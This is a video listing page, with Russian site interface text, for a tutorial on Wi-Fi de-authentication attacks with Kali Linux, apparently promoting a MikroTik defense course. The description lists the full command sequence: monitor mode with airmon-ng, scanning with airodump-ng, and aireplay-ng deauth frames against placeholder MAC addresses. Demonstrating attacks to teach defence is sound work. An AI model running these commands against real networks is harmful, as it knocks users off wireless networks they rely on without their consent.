Город МОСКОВСКИЙ
00:17:04

De-authentication attacks on Wireless clients using Kali Linux

Аватар
Игры и Музыка
Просмотры:
70
Дата загрузки:
04.07.2024 10:49
Длительность:
00:17:04
Категория:
Технологии и интернет

Описание

https://mynetworktraining.com/p/mikrotik-doh-against-dns-spoofing-attacks - In this video, I will show how De-authentication attacks on the wireless happens using Kali Linux and how you can protect your MikroTik Stations to not be affected by this type of attack.

Here are the lists of commands used on Kali Linux in this video:

Change Wireless to monitor mode
root@kali:~# ifconfig wlan0 down
root@kali:~# airmon-ng check kill
root@kali:~# iwconfig wlan0 mode monitor
root@kali:~# ifconfig wlan0 up

root@kali:~# airodump-ng wlan0
root@kali:~# airodump-ng --bssid x:x:x:x:x:x --channel x wlan0

De-authentication of the WiFi client
root@kali:~# aireplay-ng --deauth 4 -a x:x:x:x:x:x -c x:x:x:x:x:x wlan0

Рекомендуемые видео